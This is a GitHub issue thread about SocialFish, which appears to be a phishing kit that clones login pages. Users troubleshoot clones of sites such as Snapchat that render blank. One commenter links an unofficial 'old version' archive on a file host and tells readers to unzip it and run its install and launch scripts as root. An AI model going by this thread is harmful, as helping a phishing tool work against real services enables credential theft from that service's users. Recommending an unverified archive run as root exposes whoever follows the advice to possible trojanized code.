### ISSUE TITLE
Not working

### ISSUE THREAD

**Issue by s7612f** [UndeadSec/SocialFish#278]
1) <img width="1418" alt="Screenshot 2021-03-27 at 14 12 04" src="https://user-images.githubusercontent.com/75951407/112723478-a3771c00-8f06-11eb-9926-4a37a7c583c8.png">

2) <img width="311" alt="Screenshot 2021-03-27 at 14 12 21" src="https://user-images.githubusercontent.com/75951407/112723487-ad008400-8f06-11eb-8ecc-cbc356def014.png">

3)  <img width="1429" alt="Screenshot 2021-03-27 at 14 12 40" src="https://user-images.githubusercontent.com/75951407/112723492-b558bf00-8f06-11eb-8ac0-89511982c15a.png">

^On Kali, Firefox, Virtualbox 

Why does it do this? I tried with other websites like Snapchat, etc, but they just showed up blank. Do I need to change the https://1.1.1.1:5000 link? 

*New to this so apologies if this is a rookie mistake.

**Comment by jollran2005** [comment]
I have the exact same problem! Please help!

**Comment by JustVladKaz** [comment]
Hey there! I guess @UndeadSec changed SocialFish's files in new updates...
Really working (old) version of SocialFish script is here: [https://oxy.st/d/Bkud](url)

So to speak, I also tried to use current version from github, but is doesn't satisfy me.
My advice: use old version!

Instructions step by step:
1) Download file (it is not mine, i just find tutorial on youtube with tutorial to old version)
2) Unzip file to root (or kali) directory:
![Снимок экрана 2021-05-13 12:29:59](https://user-images.githubusercontent.com/73641038/118107030-f5a4cb80-b3e6-11eb-8a9e-c59172d340b3.png)
3) Go to this folder: _SocialFish+load_
4) Run terminal in folder (right mouse button -> open terminal)
**further as root*** <--------
5) `sh install.sh`
6) Here you are!

In the future to run SocialFish just do: (as root*)
1) `cd  /root/SocialFish+load`
2) `sh sf.sh`

Here is Youtube tutorial, but it not in English( [https://clck.ru/UnXhr](url)
